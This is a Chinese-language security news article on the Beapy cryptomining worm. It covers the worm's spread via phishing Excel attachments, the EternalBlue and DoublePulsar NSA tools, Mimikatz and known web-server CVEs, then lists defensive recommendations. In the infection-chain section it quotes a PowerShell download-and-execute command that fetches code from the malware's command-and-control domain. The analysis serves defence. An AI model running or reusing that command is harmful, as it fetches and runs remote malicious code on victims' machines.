新恶意软件利用NSA黑客工具在企业网络中传播

关注 2019-07-08 22:42:39 查看数 14273 ,评论数 0 工具 资讯 企业安全

还记得不搞事则已,一搞事惊人的著名黑客组织影子经纪人(Shadow Brokers)吗?自2016年Shadow Brokers盗走并公开美国国家安全局(NSA)用来渗透至全球设备和网络的一系列恶意程序后,这些恶意程序每隔一段时间必出来刷一下存在感。



一、背景


Symantec发现了主要针对企业的新加密挖矿恶意软件,这个被称为Beapy的恶意软件利用NSA黑客工具EternalBlue(永恒之蓝)以及被盗和硬编码凭据在网络中迅速传播,以从受感染的计算机中收集凭据、迫使计算机运行挖矿代码来挖出加密数字货币——包括已修复的计算机,而且主要影响中国企业。


Beapy活动于2019年1月首次被发现,自3月初以来越来越活跃,也出现在了网络服务器上。


Beapy(W32.Beapy)是一个基于文件的coinminer,它使用电子邮件作为初始感染向量。这项活动表明,尽管自2018年初以来加密货币挖矿活动有所下降,但它仍然是一些网络犯罪分子关注的焦点,企业现已成为主要的攻击目标。


Beapy的受害者几乎都为企业,虽然研究人员没有证据表明这些攻击是有针对性的,但Beapy的蠕虫功能表明它可能会在整个企业网络中传播。


Beapy对亚洲企业的影响最大,80%以上的受害者位于中国,其它受害者分别位于韩国、日本、菲律宾、越南以及孟加拉国,一些美洲(美国和牙买加)企业也受到了影响。


二、感染链


Beapy利用恶意电子邮件做为初始载体,电子邮件中包含一个恶意Excel文档的附件。如果电子邮件收件人打开该恶意附件,目标计算机就会下载NSA开发的DoublePulsar(双脉冲星)后门(Backdoor.Doublepulsar)。后门安装后,就可以在受感染的计算机上远程执行代码。EternalBlue利用Windows SMB协议中的漏洞允许文件在网络中横向传播。


安装DoublePulsar后会执行PowerShell命令,并在将coinminer下载到目标计算机之前与Beapy命令和控制(C&C)服务器进行联系。


根据研究人员捕获到的样本显示,活动最早开始于2019年2月15日,即第一次检测到DoublePulsar后门的时间。然后研究人员发现了正在执行的PowerShell命令,该命令解码为以下内容:IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v”+$env:USERDOMAIN)。执行了一些PowerShell命令后就会下载挖矿模块以“无文件”方式进行门罗币挖矿。


Beapy首先攻击未打补丁的计算机,然后利用EternalBlue感染其他机器。但是Beapy不仅只利用NSA的黑客工具进行传播,它还使用凭证窃取工具Hacktool.Mimikatz来尝试从受感染的计算机收集凭据,使用硬编码的用户名和密码列表来尝试跨网络传播。


三、Web服务器


Symantec遥测还在一台开放的Web服务器上发现了Beapy的旧版本,该蠕虫正在尝试通过生成IP地址列表感染连接到服务器上的计算机。


在Web服务器上发现的Beapy版本比较旧,是用C语言编写的,而新版本的Beapy都是用Python编写的。但是功能类似,下载的恶意软件也包含用于凭据收集的Mimikatz模块,以及EternalBlue漏洞利用功能。


在被感染的Web服务器中,Beapy还试图利用Apache Struts漏洞(CVE-2017-5638),该漏洞已于2017年修补,但一旦成功利用该漏洞,就可以执行远程代码。Beapy还试图利用Apache Tomcat(CVE-2017-12615)和Oracle WebLogic Server(CVE-2017-10271)中的已知漏洞。


总的来说,Beapy活动自3月初以来一直在增加。


四、EternalBlue和DoublePulsar


EternalBlue和DoublePulsar都是黑客组织Shadow Brokers公布的NSA黑客工具,曾被用于2017年极具破坏性的WannaCry勒索软件攻击。


EternalBlue专门远程攻击Windows文件共享端口(445端口),无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。


在此次活动中,攻击者对EternalBlue下载器木马进行了更新,更新后启用了新的C2域名。EternalBlue下载器木马一直在不断更新,最新的更新时间线如下:


NSA的一系列SMB 漏洞利用的背后,最后都会使用到DoublePulsar 后门。DoublePulsar后门是一个无文件内核级的SMB后门,一个安全的系统一旦被植入了该后门,就可以被长期、远程控制,那么系统就不再安全。


受DoublePulsar的启发,美国网络安全公司RiskSence研究人员Sean Dillon创建了一个名为“SMBdoor”的恶意软件后门,突出了防病毒产品没有关注的操作系统部分。SMBdoor后门一旦被安装,就会滥用srvnet.sys进程中未经记录的API,将自己注册为服务器消息块(SMB)连接的有效处理程序。该后门非常隐蔽,因其不会将任何本地套接字、打开端口或挂钩绑定到现有功能,避免触发了某些防病毒系统警报。


但SMBdoor代码主要用于学术研究,网络犯罪分子不能像部署DoublePulsar一样,从GitHub上下载和感染用户。


五、对企业的影响


虽然加密货币挖掘恶意软件不如勒索软件的破坏性大,但它仍可能对公司的运营产生重大影响。对企业的潜在影响包括:


  • 设备性能下降,导致生产力下降;
  • 电池过热;
  • 设备不稳定或无法使用,导致IT成本增加;
  • 企业成本增加,原因有二:用电量增加;有些企业使用的云服务按CPU使用率收费。

所以企业需要确保其网络免受各种网络安全威胁的侵害。


六、建议


1、查看Powershell进程有误异常网络访问、异常CPU占用情况,如有及时使用杀毒软件对系统进行全面扫描。

2、安装永恒之蓝漏洞补丁,手动下载请访问以下页面:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx,其中WinXP、Windows Server 2003用户请访问:

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598。

3、尽量关闭不必要的端口,如:445、135,139等,对3389、5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。

4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。

5、对重要文件和数据(数据库等数据)进行定期非本地备份。

6、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解。

7、在终端/服务器部署专业杀毒软件,防御病毒木马入侵,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。

交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧
css.php
正在加载中...